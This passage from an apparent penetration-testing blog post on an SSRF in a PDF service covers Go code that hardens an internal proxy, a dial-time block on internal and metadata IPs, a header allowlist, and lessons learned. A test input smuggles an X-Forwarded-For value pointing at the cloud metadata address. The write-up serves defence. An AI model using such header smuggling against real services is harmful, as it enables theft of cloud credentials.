        "fmt"
        "io"
        "log"
        "net/http"
        "net/url" // For parsing URLs
        "strings"
    )
    
    // Function to validate target URLs for the proxy
    func isValidProxyTargetUrl(targetURL string) bool {
        u, err := url.Parse(targetURL)
        if err != nil || (u.Scheme != "http" && u.Scheme != "https") || u.Hostname() == "" {
            return false
        }
    
        // Implement strict whitelisting for domains the proxy is allowed to fetch from.
        // Or, more robustly, block all private IPs after DNS resolution.
        // For simplicity, we'll assume the `pdf-gen-svc` has already done primary URL validation.
        // The proxy's role is to ensure it doesn't get tricked by headers.
    
        // Crucially, the proxy *must not* use X-Forwarded-For for routing.
        return true
    }
    
    func fetchHandler(w http.ResponseWriter, r *http.Request) {
        if r.Method != http.MethodPost {
            http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
            return
        }
    
        var requestBody struct {
            TargetURL string            `json:"targetUrl"`
            Headers   map[string]string `json:"headers"`
        }
    
        // Parse the JSON body sent by pdf-gen-svc, capped at 1 MiB.
        if err := json.NewDecoder(http.MaxBytesReader(w, r.Body, 1<<20)).Decode(&requestBody); err != nil {
            http.Error(w, "Invalid request body", http.StatusBadRequest)
            return
        }
    
        if !isValidProxyTargetUrl(requestBody.TargetURL) {
            http.Error(w, "Invalid target URL for proxy", http.StatusBadRequest)
            return
        }
    
        // CRITICAL FIX: The proxy *must not* use X-Forwarded-For or similar headers for routing.
        // It should *always* use the `targetURL` provided directly for the actual network connection.
        req, err := http.NewRequest(http.MethodGet, requestBody.TargetURL, nil) // Always use TargetURL
        if err != nil {
            http.Error(w, fmt.Sprintf("Failed to create request: %v", err), http.StatusInternalServerError)
            return
        }
    
        // Only set whitelisted headers if necessary, or pass none from user input.
        // For this example, we'll assume the pdf-gen-svc has already sanitized them.
        for k, v := range requestBody.Headers {
            // Explicitly block sensitive headers from being set by user input on the proxy
            if strings.EqualFold(k, "Host") || strings.EqualFold(k, "X-Forwarded-For") || strings.EqualFold(k, "X-Real-IP") {
                continue // Do not allow these to be set by user
            }
            req.Header.Set(k, v)
        }
    
        // Do not follow redirects: a 3xx pointing at an internal address would
        // otherwise bypass the validation performed on the original URL.
        client := &http.Client{
            CheckRedirect: func(*http.Request, []*http.Request) error {
                return http.ErrUseLastResponse
            },
        }
        resp, err := client.Do(req)
        if err != nil {
            http.Error(w, fmt.Sprintf("Failed to fetch content: %v", err), http.StatusInternalServerError)
            return
        }
        defer resp.Body.Close()
    
        body, err := io.ReadAll(resp.Body)
        if err != nil {
            http.Error(w, fmt.Sprintf("Failed to read response body: %v", err), http.StatusInternalServerError)
            return
        }
    
        w.WriteHeader(resp.StatusCode)
        w.Write(body)
    }
    
    func main() {
        http.HandleFunc("/fetch", fetchHandler)
        log.Fatal(http.ListenAndServe(":8080", nil))
    }
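
    The comments in the proxy mention blocking private IPs after DNS resolution as the more robust option. One way to sketch that, under stated assumptions, is to check the address at connect time through net.Dialer's Control hook. The hook sees the already-resolved "ip:port", so the check covers every connection the client opens and is not fooled by a hostname that resolves differently between validation and fetch. The names isInternalIP, checkDialAddress, and newGuardedClient are hypothetical, and the timeouts are arbitrary; the address classes come from Go's net.IP helper methods and are not a complete list of ranges an environment may need to block.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"net/http"
	"syscall"
	"time"
)

var errBlockedAddress = errors.New("destination address is not allowed")

// isInternalIP reports whether ip is loopback, private, link-local
// (which includes 169.254.169.254), or unspecified.
func isInternalIP(ip net.IP) bool {
	return ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast() ||
		ip.IsLinkLocalMulticast() || ip.IsUnspecified()
}

// checkDialAddress validates the "ip:port" string the dialer is about to
// connect to. Anything that is not a plain IP literal fails closed.
func checkDialAddress(address string) error {
	host, _, err := net.SplitHostPort(address)
	if err != nil {
		return err
	}
	ip := net.ParseIP(host)
	if ip == nil || isInternalIP(ip) {
		return errBlockedAddress
	}
	return nil
}

// newGuardedClient returns an HTTP client whose outbound connections all
// pass through checkDialAddress before the socket connects.
func newGuardedClient() *http.Client {
	dialer := &net.Dialer{
		Timeout: 5 * time.Second,
		Control: func(network, address string, _ syscall.RawConn) error {
			return checkDialAddress(address)
		},
	}
	return &http.Client{
		Timeout:   10 * time.Second,
		Transport: &http.Transport{DialContext: dialer.DialContext},
	}
}

func main() {
	for _, addr := range []string{"169.254.169.254:80", "10.0.0.5:8080", "93.184.216.34:443"} {
		fmt.Printf("%-22s blocked=%v\n", addr, checkDialAddress(addr) != nil)
	}
	// A request to loopback is refused before any bytes are sent.
	_, err := newGuardedClient().Get("http://127.0.0.1:1/")
	fmt.Println("loopback request failed:", err != nil)
}
```

    In the proxy, a client built this way could stand in for the plain http.Client. It is a sketch of an application-level backstop, not a substitute for egress filtering at the network layer.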
    

    This engagement was a stark reminder of several fundamental security principles that often get overlooked in the rush to build and deploy:

    • Never Trust User Input, Even for Headers: It's a mantra for URLs and body content, but developers often forget that HTTP headers, especially in a microservices context, can also be user-controlled and just as dangerous. Always validate and sanitize *all* input.
    • The "Innocuous" Services Are Often the Most Vulnerable: A PDF generation service might seem low-risk, but any service that makes outbound network requests is a potential SSRF vector. These are often overlooked because they aren't directly handling payment or authentication.
    • Network Segmentation is Your Last Stand: Even with perfect application-level validation, a misconfiguration or a new vulnerability can emerge. Robust egress filtering and network segmentation are crucial safety nets. If neither the pdf-gen-svc nor the internal proxy could reach 169.254.169.254 at all, this attack would have been dead in the water.
    • AWS IMDSv2 is a Game-Changer for SSRF: If you're running EC2 instances, enforce IMDSv2. It's a powerful control that makes it significantly harder for attackers to exfiltrate temporary credentials via SSRF, requiring a multi-stage attack that many SSRF vectors simply can't achieve.
    • Proxies are Powerful, But Dangerous: Internal proxies, while useful for traffic management and security, introduce a new layer of complexity and potential vulnerabilities. Their configuration must be scrutinized with extreme care, especially regarding how they handle headers and route requests.
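
    The first lesson, treating headers as untrusted input, can be sketched on the Go side as an allowlist rather than a denylist. This is a minimal illustration under assumptions: the allowedHeaders set simply mirrors the User-Agent/Referer example used for the pdf-gen-svc, and sanitizeHeaders is a hypothetical helper name. Header names are canonicalized first, because HTTP header names are case-insensitive and a case-sensitive comparison is easy to get wrong.

```go
package main

import (
	"fmt"
	"net/http"
	"strings"
)

// allowedHeaders is a hypothetical allowlist, keyed by canonical header name.
var allowedHeaders = map[string]bool{
	"User-Agent": true,
	"Referer":    true,
}

// sanitizeHeaders keeps only allowlisted headers. Names are canonicalized so
// "user-agent" and "User-Agent" are treated alike, and values containing CR
// or LF are dropped to rule out header injection.
func sanitizeHeaders(in map[string]string) http.Header {
	out := http.Header{}
	for name, value := range in {
		key := http.CanonicalHeaderKey(strings.TrimSpace(name))
		if !allowedHeaders[key] || strings.ContainsAny(value, "\r\n") {
			continue
		}
		out.Set(key, value)
	}
	return out
}

func main() {
	clean := sanitizeHeaders(map[string]string{
		"user-agent":      "pdf-gen/1.0",
		"x-forwarded-for": "169.254.169.254",
		"Host":            "internal-proxy.corp",
	})
	fmt.Println(len(clean), clean.Get("User-Agent"))
}
```

    With an allowlist, a header nobody thought to ban (a new routing or override header, for instance) is dropped by default, which is the safer failure mode for a service that forwards requests on a user's behalf.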

    Security isn't just about finding the big, flashy exploits. It's about understanding the subtle interactions, the forgotten configurations, and the common assumptions that create these critical vulnerabilities. Keep your eyes sharp, your validation strict, and your network boundaries tight.

    Got a challenging security problem or want to sharpen your pentesting skills? Don't hesitate to reach out! You can book a 1:1 security mentorship session with me, Debasis Bhattacharjee, at thedevdude.com. Let's talk shop and make the digital world a safer place, one system at a time.

    ID: RTL-2026-001  ·  Web Application Pentesting  ·  Severity: CRITICAL  ·  2026-05-23